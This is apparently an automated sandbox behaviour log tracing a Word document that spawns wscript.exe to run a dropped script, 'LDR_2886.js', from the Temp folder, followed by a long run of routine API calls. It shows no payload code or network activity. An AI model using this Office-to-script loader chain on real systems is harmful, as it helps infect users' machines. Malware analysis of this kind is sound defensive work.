# Flog Txt Version 1
# Analyzer Version: 3.0.2
# Analyzer Build Date: Jul  9 2019 16:03:52
# Log Creation Date: 26.07.2019 16:45:09.350

Process:
	id = "1"
	image_name = "winword.exe"
	filename = "c:\\program files\\microsoft office\\root\\office16\\winword.exe"
	page_root = "0x3e3b8000"
	os_pid = "0x910"
	os_integrity_level = "0x2000"
	os_privileges = "0x800000"
	monitor_reason = "analysis_target"
	parent_id = "0"
	os_parent_pid = "0x0"
	cmd_line = "\"C:\\Program Files\\Microsoft Office\\Root\\Office16\\WINWORD.EXE\" /n"
	cur_dir = "C:\\Users\\aETAdzjz\\Desktop\\"
	os_username = "YKYD69Q\\aETAdzjz"
	bitness = "64"
	os_groups = "YKYD69Q\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e8ca" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 1
	os_tid = 0x9b8


Thread:
	id = 2
	os_tid = 0x9b4


Thread:
	id = 3
	os_tid = 0x9a0


Thread:
	id = 4
	os_tid = 0x99c


Thread:
	id = 5
	os_tid = 0x98c


Thread:
	id = 6
	os_tid = 0x988


Thread:
	id = 7
	os_tid = 0x984


Thread:
	id = 8
	os_tid = 0x97c


Thread:
	id = 9
	os_tid = 0x974


Thread:
	id = 10
	os_tid = 0x970


Thread:
	id = 11
	os_tid = 0x96c


Thread:
	id = 12
	os_tid = 0x960


Thread:
	id = 13
	os_tid = 0x954


Thread:
	id = 14
	os_tid = 0x950


Thread:
	id = 15
	os_tid = 0x94c


Thread:
	id = 16
	os_tid = 0x928


Thread:
	id = 17
	os_tid = 0x924


Thread:
	id = 18
	os_tid = 0x920


Thread:
	id = 19
	os_tid = 0x91c


Thread:
	id = 20
	os_tid = 0x918


Thread:
	id = 21
	os_tid = 0x914


Thread:
	id = 22
	os_tid = 0xa2c


Thread:
	id = 23
	os_tid = 0xa44


Thread:
	id = 24
	os_tid = 0xb54


Thread:
	id = 26
	os_tid = 0xb60


Thread:
	id = 34
	os_tid = 0xba0


Thread:
	id = 36
	os_tid = 0xbac


Thread:
	id = 50
	os_tid = 0x52c


Thread:
	id = 54
	os_tid = 0x8f0


Thread:
	id = 68
	os_tid = 0x80c


Thread:
	id = 97
	os_tid = 0x940


Thread:
	id = 102
	os_tid = 0x4f4


Thread:
	id = 103
	os_tid = 0x978


Thread:
	id = 110
	os_tid = 0x260


Thread:
	id = 112
	os_tid = 0x874


Thread:
	id = 114
	os_tid = 0x90


Thread:
	id = 130
	os_tid = 0xa20


Thread:
	id = 131
	os_tid = 0xa3c


Thread:
	id = 132
	os_tid = 0xa34


Thread:
	id = 134
	os_tid = 0xad4


Thread:
	id = 145
	os_tid = 0x858


Thread:
	id = 147
	os_tid = 0xbc0


Thread:
	id = 161
	os_tid = 0x8d4


Thread:
	id = 162
	os_tid = 0x820


Thread:
	id = 164
	os_tid = 0x8f8


Thread:
	id = 166
	os_tid = 0x8c8


Thread:
	id = 177
	os_tid = 0x5c8


Thread:
	id = 183
	os_tid = 0xbe4


Thread:
	id = 189
	os_tid = 0xa3c


Thread:
	id = 192
	os_tid = 0xb08


Thread:
	id = 209
	os_tid = 0x71c


Thread:
	id = 210
	os_tid = 0x6bc


Thread:
	id = 212
	os_tid = 0xb84


Thread:
	id = 214
	os_tid = 0x5cc


Thread:
	id = 226
	os_tid = 0x8d4


Thread:
	id = 230
	os_tid = 0x178


Thread:
	id = 239
	os_tid = 0x6fc


Thread:
	id = 250
	os_tid = 0x70c


Thread:
	id = 256
	os_tid = 0x4f4


Thread:
	id = 258
	os_tid = 0xa3c


Thread:
	id = 263
	os_tid = 0x4b4


Thread:
	id = 265
	os_tid = 0x9a8


Thread:
	id = 274
	os_tid = 0x184


Thread:
	id = 277
	os_tid = 0xb84


Thread:
	id = 278
	os_tid = 0x6fc


Thread:
	id = 280
	os_tid = 0x95c


Thread:
	id = 288
	os_tid = 0xa3c


Thread:
	id = 290
	os_tid = 0x8cc


Thread:
	id = 298
	os_tid = 0x6ec


Thread:
	id = 300
	os_tid = 0x288


Thread:
	id = 348
	os_tid = 0xd04


Thread:
	id = 350
	os_tid = 0xd0c


Thread:
	id = 352
	os_tid = 0xd1c


Thread:
	id = 353
	os_tid = 0xd20


Thread:
	id = 354
	os_tid = 0xd28


Thread:
	id = 356
	os_tid = 0xd58


Thread:
	id = 376
	os_tid = 0xf10


Process:
	id = "2"
	image_name = "wscript.exe"
	filename = "c:\\windows\\system32\\wscript.exe"
	page_root = "0x2857d000"
	os_pid = "0xb58"
	os_integrity_level = "0x2000"
	os_privileges = "0x800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0x910"
	cmd_line = "\"C:\\Windows\\System32\\WScript.exe\" \"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\LDR_2886.js\" "
	cur_dir = "C:\\Users\\aETAdzjz\\Documents\\"
	os_username = "YKYD69Q\\aETAdzjz"
	bitness = "64"
	os_groups = "YKYD69Q\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e8ca" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 25
	os_tid = 0xb5c

	[0043.612] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x25fe00 | out: lpSystemTimeAsFileTime=0x25fe00*(dwLowDateTime=0x940c7d50, dwHighDateTime=0x1d543d1)) 
	[0043.613] GetCurrentProcessId () returned 0xb58
	[0043.613] GetCurrentThreadId () returned 0xb5c
	[0043.613] GetTickCount () returned 0x1c773
	[0043.613] QueryPerformanceCounter (in: lpPerformanceCount=0x25fe08 | out: lpPerformanceCount=0x25fe08*=16803872105) returned 1
	[0043.613] GetStartupInfoA (in: lpStartupInfo=0x25fe20 | out: lpStartupInfo=0x25fe20*(cb=0x68, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Windows\\System32\\WScript.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffffffffffff, hStdOutput=0xffffffffffffffff, hStdError=0xffffffffffffffff)) 
	[0043.614] GetModuleHandleA (lpModuleName=0x0) returned 0xff410000
	[0043.614] GetModuleHandleA (lpModuleName=0x0) returned 0xff410000
	[0043.614] GetVersionExA (in: lpVersionInformation=0x25fd40*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0x3f1eb0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x25fd40*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0043.614] GetUserDefaultLCID () returned 0x409
	[0043.614] CoInitialize (pvReserved=0x0) returned 0x0
	[0044.101] GetCommandLineW () returned="\"C:\\Windows\\System32\\WScript.exe\" \"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\LDR_2886.js\" "
	[0044.101] lstrlenW (lpString="\"C:\\Windows\\System32\\WScript.exe\" \"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\LDR_2886.js\" ") returned 85
	[0044.101] ??2@YAPEAX_K@Z () returned 0xd57b0
	[0044.102] ??2@YAPEAX_K@Z () returned 0xd5f60
	[0044.103] GetCurrentThreadId () returned 0xb5c
	[0044.103] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x25fa88 | out: phkResult=0x25fa88*=0x7c) returned 0x0
	[0044.103] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x25fa80 | out: phkResult=0x25fa80*=0x80) returned 0x0
	[0044.103] RegQueryValueExW (in: hKey=0x80, lpValueName="IgnoreUserSettings", lpReserved=0x0, lpType=0x25ed88, lpData=0x25f190, lpcbData=0x25ed80*=0x400 | out: lpType=0x25ed88*=0x0, lpData=0x25f190*=0x67, lpcbData=0x25ed80*=0x400) returned 0x2
	[0044.103] RegQueryValueExW (in: hKey=0x7c, lpValueName="Enabled", lpReserved=0x0, lpType=0x25ed88, lpData=0x25f190, lpcbData=0x25ed80*=0x400 | out: lpType=0x25ed88*=0x0, lpData=0x25f190*=0x67, lpcbData=0x25ed80*=0x400) returned 0x2
	[0044.103] RegQueryValueExW (in: hKey=0x80, lpValueName="Enabled", lpReserved=0x0, lpType=0x25ed88, lpData=0x25f190, lpcbData=0x25ed80*=0x400 | out: lpType=0x25ed88*=0x0, lpData=0x25f190*=0x67, lpcbData=0x25ed80*=0x400) returned 0x2
	[0044.103] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x0, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0
	[0044.542] RegCloseKey (hKey=0x80) returned 0x0
	[0044.542] RegCloseKey (hKey=0x7c) returned 0x0
	[0044.542] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x25f7a0 | out: phkResult=0x25f7a0*=0x7c) returned 0x0
	[0044.543] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x25f798 | out: phkResult=0x25f798*=0x80) returned 0x0
	[0044.543] RegQueryValueExW (in: hKey=0x80, lpValueName="IgnoreUserSettings", lpReserved=0x0, lpType=0x25eaa8, lpData=0x25eeb0, lpcbData=0x25eaa0*=0x400 | out: lpType=0x25eaa8*=0x0, lpData=0x25eeb0*=0x0, lpcbData=0x25eaa0*=0x400) returned 0x2
	[0044.543] RegQueryValueExW (in: hKey=0x7c, lpValueName="LogSecuritySuccesses", lpReserved=0x0, lpType=0x25eaa8, lpData=0x25eeb0, lpcbData=0x25eaa0*=0x400 | out: lpType=0x25eaa8*=0x0, lpData=0x25eeb0*=0x0, lpcbData=0x25eaa0*=0x400) returned 0x2
	[0044.543] RegQueryValueExW (in: hKey=0x80, lpValueName="LogSecuritySuccesses", lpReserved=0x0, lpType=0x25eaa8, lpData=0x25eeb0, lpcbData=0x25eaa0*=0x400 | out: lpType=0x25eaa8*=0x0, lpData=0x25eeb0*=0x0, lpcbData=0x25eaa0*=0x400) returned 0x2
	[0044.543] RegCloseKey (hKey=0x80) returned 0x0
	[0044.543] RegCloseKey (hKey=0x7c) returned 0x0
	[0044.543] GetACP () returned 0x4e4
	[0044.543] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x77040000
	[0044.544] GetProcAddress (hModule=0x77040000, lpProcName="HeapSetInformation") returned 0x7705c4a0
	[0044.544] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1
	[0044.544] FreeLibrary (hLibModule=0x77040000) returned 1
	[0044.544] ??2@YAPEAX_K@Z () returned 0xd5f80
	[0044.544] CoRegisterMessageFilter (in: lpMessageFilter=0xd5f80, lplpMessageFilter=0xd5f90 | out: lplpMessageFilter=0xd5f90*=0x0) returned 0x0
	[0044.544] GetModuleFileNameW (in: hModule=0xff410000, lpFilename=0x25fae0, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\WScript.exe" (normalized: "c:\\windows\\system32\\wscript.exe")) returned 0x1f
	[0044.545] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\System32\\WScript.exe", lpdwHandle=0x25f430 | out: lpdwHandle=0x25f430) returned 0x704
	[0044.545] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\System32\\WScript.exe", dwHandle=0x0, dwLen=0x704, lpData=0x25ed20 | out: lpData=0x25ed20) returned 1
	[0044.545] VerQueryValueW (in: pBlock=0x25ed20, lpSubBlock="\\", lplpBuffer=0x25f438, puLen=0x25f434 | out: lplpBuffer=0x25f438*=0x25ed48, puLen=0x25f434) returned 1
	[0044.545] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x25f488 | out: phkResult=0x25f488*=0x7c) returned 0x0
	[0044.545] RegQueryValueExW (in: hKey=0x7c, lpValueName="IgnoreUserSettings", lpReserved=0x0, lpType=0x25e7d8, lpData=0x25ebe0, lpcbData=0x25e7d0*=0x400 | out: lpType=0x25e7d8*=0x0, lpData=0x25ebe0*=0x0, lpcbData=0x25e7d0*=0x400) returned 0x2
	[0044.545] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x25f440 | out: phkResult=0x25f440*=0x80) returned 0x0
	[0044.545] RegQueryValueExW (in: hKey=0x80, lpValueName="TrustPolicy", lpReserved=0x0, lpType=0x25f404, lpData=0x25f480, lpcbData=0x25f400*=0x4 | out: lpType=0x25f404*=0x0, lpData=0x25f480*=0xb0, lpcbData=0x25f400*=0x4) returned 0x2
	[0044.546] RegQueryValueExW (in: hKey=0x80, lpValueName="UseWINSAFER", lpReserved=0x0, lpType=0x25e7d8, lpData=0x25ebe0, lpcbData=0x25e7d0*=0x400 | out: lpType=0x25e7d8*=0x0, lpData=0x25ebe0*=0x0, lpcbData=0x25e7d0*=0x400) returned 0x2
	[0044.546] RegQueryValueExW (in: hKey=0x7c, lpValueName="TrustPolicy", lpReserved=0x0, lpType=0x25f404, lpData=0x25f480, lpcbData=0x25f400*=0x4 | out: lpType=0x25f404*=0x0, lpData=0x25f480*=0xb0, lpcbData=0x25f400*=0x4) returned 0x2
	[0044.546] RegQueryValueExW (in: hKey=0x7c, lpValueName="UseWINSAFER", lpReserved=0x0, lpType=0x25e7d8, lpData=0x25ebe0, lpcbData=0x25e7d0*=0x400 | out: lpType=0x25e7d8*=0x1, lpData="1", lpcbData=0x25e7d0*=0x4) returned 0x0
	[0044.546] lstrlenW (lpString="1") returned 1
	[0044.546] lstrlenW (lpString="0") returned 1
	[0044.546] lstrlenW (lpString="1") returned 1
	[0044.546] lstrlenW (lpString="no") returned 2
	[0044.546] lstrlenW (lpString="1") returned 1
	[0044.546] lstrlenW (lpString="false") returned 5
	[0044.546] RegCloseKey (hKey=0x80) returned 0x0
	[0044.546] RegCloseKey (hKey=0x7c) returned 0x0
	[0044.546] RegCreateKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x20019, lpSecurityAttributes=0x0, phkResult=0x25f488, lpdwDisposition=0x0 | out: phkResult=0x25f488*=0x7c, lpdwDisposition=0x0) returned 0x0
	[0044.546] RegQueryValueExW (in: hKey=0x7c, lpValueName="Timeout", lpReserved=0x0, lpType=0x25f424, lpData=0x25f480, lpcbData=0x25f420*=0x4 | out: lpType=0x25f424*=0x0, lpData=0x25f480*=0xb0, lpcbData=0x25f420*=0x4) returned 0x2
	[0044.546] RegQueryValueExW (in: hKey=0x7c, lpValueName="DisplayLogo", lpReserved=0x0, lpType=0x25e7f8, lpData=0x25ec00, lpcbData=0x25e7f0*=0x400 | out: lpType=0x25e7f8*=0x1, lpData="1", lpcbData=0x25e7f0*=0x4) returned 0x0
	[0044.546] lstrlenW (lpString="1") returned 1
	[0044.546] lstrlenW (lpString="0") returned 1
	[0044.546] lstrlenW (lpString="1") returned 1
	[0044.546] lstrlenW (lpString="no") returned 2
	[0044.546] lstrlenW (lpString="1") returned 1
	[0044.546] lstrlenW (lpString="false") returned 5
	[0044.546] RegCloseKey (hKey=0x7c) returned 0x0
	[0044.546] RegCreateKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x20019, lpSecurityAttributes=0x0, phkResult=0x25f488, lpdwDisposition=0x0 | out: phkResult=0x25f488*=0x7c, lpdwDisposition=0x0) returned 0x0
	[0044.546] RegQueryValueExW (in: hKey=0x7c, lpValueName="Timeout", lpReserved=0x0, lpType=0x25f424, lpData=0x25f480, lpcbData=0x25f420*=0x4 | out: lpType=0x25f424*=0x0, lpData=0x25f480*=0xb0, lpcbData=0x25f420*=0x4) returned 0x2
	[0044.546] RegQueryValueExW (in: hKey=0x7c, lpValueName="DisplayLogo", lpReserved=0x0, lpType=0x25e7f8, lpData=0x25ec00, lpcbData=0x25e7f0*=0x400 | out: lpType=0x25e7f8*=0x0, lpData=0x25ec00*=0x31, lpcbData=0x25e7f0*=0x400) returned 0x2
	[0044.547] RegCloseKey (hKey=0x7c) returned 0x0
	[0044.547] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\LDR_2886.js") returned 48
	[0044.547] lstrlenW (lpString="js") returned 2
	[0044.547] lstrlenW (lpString="WSH") returned 3
	[0044.547] ??2@YAPEAX_K@Z () returned 0xd5870
	[0044.547] LoadStringW (in: hInstance=0xff410000, uID=0x9c5, lpBuffer=0x25def0, cchBufferMax=2048 | out: lpBuffer="Windows Script Host") returned 0x13
	[0044.547] LoadTypeLib (in: szFile="C:\\Windows\\System32\\WScript.exe", pptlib=0x25ef30*=0x0 | out: pptlib=0x25ef30*=0x41d100) returned 0x0
	[0044.554] ITypeLib:GetTypeInfoOfGuid (in: This=0x41d100, GUID=0xff4158f0, ppTInfo=0x25ef18 | out: ppTInfo=0x25ef18*=0x41e4e8) returned 0x0
	[0044.556] ITypeInfo:GetRefTypeOfImplType (in: This=0x41e4e8, index=0xffffffff, pRefType=0x25ef10 | out: pRefType=0x25ef10*=0xfffffffe) returned 0x0
	[0044.556] ITypeInfo:GetRefTypeInfo (in: This=0x41e4e8, hreftype=0xfffffffe, ppTInfo=0xff42f458 | out: ppTInfo=0xff42f458*=0x41e540) returned 0x0
	[0044.556] IUnknown:Release (This=0x41e4e8) returned 0x1
	[0044.556] ??2@YAPEAX_K@Z () returned 0xd5900
	[0044.556] ??2@YAPEAX_K@Z () returned 0xd59a0
	[0044.556] ??2@YAPEAX_K@Z () returned 0xd5a00
	[0044.556] ITypeLib:GetTypeInfoOfGuid (in: This=0x41d100, GUID=0xff415950, ppTInfo=0x25ef18 | out: ppTInfo=0x25ef18*=0x41e598) returned 0x0
	[0044.556] ITypeInfo:GetRefTypeOfImplType (in: This=0x41e598, index=0xffffffff, pRefType=0x25ef10 | out: pRefType=0x25ef10*=0xfffffffe) returned 0x0
	[0044.556] ITypeInfo:GetRefTypeInfo (in: This=0x41e598, hreftype=0xfffffffe, ppTInfo=0xff42f4d8 | out: ppTInfo=0xff42f4d8*=0x41e5f0) returned 0x0
	[0044.556] IUnknown:Release (This=0x41e598) returned 0x1
	[0044.556] ITypeLib:GetTypeInfoOfGuid (in: This=0x41d100, GUID=0xff415960, ppTInfo=0x25ef18 | out: ppTInfo=0x25ef18*=0x41e648) returned 0x0
	[0044.556] ITypeInfo:GetRefTypeOfImplType (in: This=0x41e648, index=0xffffffff, pRefType=0x25ef10 | out: pRefType=0x25ef10*=0xfffffffe) returned 0x0
	[0044.556] ITypeInfo:GetRefTypeInfo (in: This=0x41e648, hreftype=0xfffffffe, ppTInfo=0xff42f518 | out: ppTInfo=0xff42f518*=0x41e6a0) returned 0x0
	[0044.556] IUnknown:Release (This=0x41e648) returned 0x1
	[0044.556] ITypeLib:GetTypeInfoOfGuid (in: This=0x41d100, GUID=0xff415910, ppTInfo=0x25ef18 | out: ppTInfo=0x25ef18*=0x41e6f8) returned 0x0
	[0044.556] ITypeInfo:GetRefTypeOfImplType (in: This=0x41e6f8, index=0xffffffff, pRefType=0x25ef10 | out: pRefType=0x25ef10*=0xfffffffe) returned 0x0
	[0044.556] ITypeInfo:GetRefTypeInfo (in: This=0x41e6f8, hreftype=0xfffffffe, ppTInfo=0xff42f498 | out: ppTInfo=0xff42f498*=0x41e750) returned 0x0
	[0044.556] IUnknown:Release (This=0x41e6f8) returned 0x1
	[0044.557] IUnknown:Release (This=0x41d100) returned 0x4
	[0044.557] ??2@YAPEAX_K@Z () returned 0xd5a60
	[0044.557] GetCurrentThreadId () returned 0xb5c
	[0044.557] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xcc
	[0044.557] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xff421cf8, lpParameter=0xd5a60, dwCreationFlags=0x0, lpThreadId=0xd5a88 | out: lpThreadId=0xd5a88*=0xb68) returned 0xd4
	[0044.557] MsgWaitForMultipleObjects (nCount=0x1, pHandles=0x25f170*=0xcc, fWaitAll=0, dwMilliseconds=0xffffffff, dwWakeMask=0xff) returned 0x0
	[0044.664] CloseHandle (hObject=0xcc) returned 1
	[0044.664] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\LDR_2886.js", nBufferLength=0x104, lpBuffer=0x25f200, lpFilePart=0x25f1f0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\LDR_2886.js", lpFilePart=0x25f1f0*="LDR_2886.js") returned 0x30
	[0044.664] RegOpenKeyExW (in: hKey=0xffffffff80000000, lpSubKey=".js", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e710 | out: phkResult=0x25e710*=0xe6) returned 0x0
	[0044.665] RegQueryValueExW (in: hKey=0xe6, lpValueName=0x0, lpReserved=0x0, lpType=0x25e6c0, lpData=0x25e720, lpcbData=0x25e6c4*=0x800 | out: lpType=0x25e6c0*=0x1, lpData="JSFile", lpcbData=0x25e6c4*=0xe) returned 0x0
	[0044.665] RegCloseKey (hKey=0xe6) returned 0x0
	[0044.665] RegOpenKeyExW (in: hKey=0xffffffff80000000, lpSubKey="JSFile\\ScriptEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e710 | out: phkResult=0x25e710*=0xe6) returned 0x0
	[0044.665] RegQueryValueExW (in: hKey=0xe6, lpValueName=0x0, lpReserved=0x0, lpType=0x25e6c0, lpData=0x25ef90, lpcbData=0x25e6c4*=0x200 | out: lpType=0x25e6c0*=0x1, lpData="JScript", lpcbData=0x25e6c4*=0x10) returned 0x0
	[0044.665] RegCloseKey (hKey=0xe6) returned 0x0
	[0044.665] ??2@YAPEAX_K@Z () returned 0xd63a0
	[0044.665] GetProcessHeap () returned 0x3f0000
	[0044.665] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x2000) returned 0x428430
	[0044.666] CLSIDFromString (in: lpsz="JScript", pclsid=0x25ef08 | out: pclsid=0x25ef08*(Data1=0xf414c260, Data2=0x6ac0, Data3=0x11cf, Data4=([0]=0xb6, [1]=0xd1, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbb, [6]=0xbb, [7]=0x58))) returned 0x0
	[0044.666] CoCreateInstance (in: rclsid=0x25ef08*(Data1=0xf414c260, Data2=0x6ac0, Data3=0x11cf, Data4=([0]=0xb6, [1]=0xd1, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbb, [6]=0xbb, [7]=0x58)), pUnkOuter=0x0, dwClsContext=0x17, riid=0xff411800*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x25ef00 | out: ppv=0x25ef00*=0xd6780) returned 0x0
	[0045.173] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x25d100 | out: lpSystemTimeAsFileTime=0x25d100*(dwLowDateTime=0x94b772f0, dwHighDateTime=0x1d543d1)) 
	[0045.173] GetCurrentProcessId () returned 0xb58
	[0045.173] GetCurrentThreadId () returned 0xb5c
	[0045.173] GetTickCount () returned 0x1cbd6
	[0045.173] QueryPerformanceCounter (in: lpPerformanceCount=0x25d108 | out: lpPerformanceCount=0x25d108*=16959931693) returned 1
	[0045.178] malloc (_Size=0x100) returned 0xd6670
	[0045.178] __dllonexit () returned 0x7fee3310728
	[0045.179] __dllonexit () returned 0x7fee3310780
	[0045.179] __dllonexit () returned 0x7fee3310750
	[0045.179] __dllonexit () returned 0x7fee33107b0
	[0045.180] LoadLibraryExA (lpLibFileName="ADVAPI32.dll", hFile=0x0, dwFlags=0x0) returned 0x7fefd710000
	[0045.180] GetProcAddress (hModule=0x7fefd710000, lpProcName="RegisterTraceGuidsA") returned 0x7717f570
	[0045.180] EtwRegisterTraceGuidsA () returned 0x0
	[0045.181] EtwRegisterTraceGuidsA () returned 0x0
	[0045.181] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x25ccf0, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\WScript.exe" (normalized: "c:\\windows\\system32\\wscript.exe")) returned 0x1f
	[0045.182] GetProcAddress (hModule=0x7fefd710000, lpProcName="RegOpenKeyExA") returned 0x7fefd72b5f0
	[0045.182] RegOpenKeyExA (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows Script\\Features", ulOptions=0x0, samDesired=0x1, phkResult=0x25ce58 | out: phkResult=0x25ce58*=0x0) returned 0x2
	[0045.187] GetVersion () returned 0x1db10106
	[0045.188] ??2@YAPEAX_K@Z () returned 0xd5aa0
	[0045.189] ??2@YAPEAX_K@Z () returned 0xd6780
	[0045.189] GetUserDefaultLCID () returned 0x409
	[0045.189] GetACP () returned 0x4e4
	[0045.189] ??3@YAXPEAX@Z () returned 0x1dd30701
	[0045.189] GetCurrentThreadId () returned 0xb5c
	[0045.189] ??2@YAPEAX_K@Z () returned 0xd5aa0
	[0045.189] GetCurrentThreadId () returned 0xb5c
	[0045.189] RegOpenKeyExA (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\COM3", ulOptions=0x0, samDesired=0x20019, phkResult=0x25ee38 | out: phkResult=0x25ee38*=0x104) returned 0x0
	[0045.190] GetProcAddress (hModule=0x7fefd710000, lpProcName="RegQueryValueExA") returned 0x7fefd72c480
	[0045.190] RegQueryValueExA (in: hKey=0x104, lpValueName="COM+Enabled", lpReserved=0x0, lpType=0x25ee30, lpData=0x25ee28, lpcbData=0x25ee20*=0x4 | out: lpType=0x25ee30*=0x4, lpData=0x25ee28*=0x1, lpcbData=0x25ee20*=0x4) returned 0x0
	[0045.190] GetProcAddress (hModule=0x7fefd710000, lpProcName="RegCloseKey") returned 0x7fefd730710
	[0045.190] RegCloseKey (hKey=0x104) returned 0x0
	[0045.190] GetModuleHandleA (lpModuleName="ole32.dll") returned 0x7fefea30000
	[0045.190] GetProcAddress (hModule=0x7fefea30000, lpProcName="CoGetObjectContext") returned 0x7fefea4c920
	[0045.190] LoadLibraryExA (lpLibFileName="ole32.dll", hFile=0x0, dwFlags=0x0) returned 0x7fefea30000
	[0045.190] GetProcAddress (hModule=0x7fefea30000, lpProcName="CoCreateInstance") returned 0x7fefea57490
	[0045.190] CoCreateInstance (in: rclsid=0x7fee337cba0*(Data1=0x323, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x7fee337cd80*(Data1=0x146, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x25ee00 | out: ppv=0x25ee00*=0x7fefec0a1b0) returned 0x0
	[0045.192] ??2@YAPEAX_K@Z () returned 0xd6b30
	[0045.192] ??2@YAPEAX_KHPEBDH@Z () returned 0xd5af0
	[0045.192] ??2@YAPEAX_K@Z () returned 0xd6bf0
	[0045.192] ??2@YAPEAX_K@Z () returned 0xd6c50
	[0045.192] ??2@YAPEAX_K@Z () returned 0xd7140
	[0045.192] GetEnvironmentVariableW (in: lpName="JS_PROFILER", lpBuffer=0x25edc0, nSize=0x27 | out: lpBuffer="") returned 0x0
	[0045.192] GetUserDefaultLCID () returned 0x409
	[0045.192] IsValidLocale (Locale=0x409, dwFlags=0x1) returned 1
	[0045.193] GetLocaleInfoA (in: Locale=0x409, LCType=0x1004, lpLCData=0x25ee60, cchData=6 | out: lpLCData="1252") returned 5
	[0045.193] IsValidCodePage (CodePage=0x4e4) returned 1
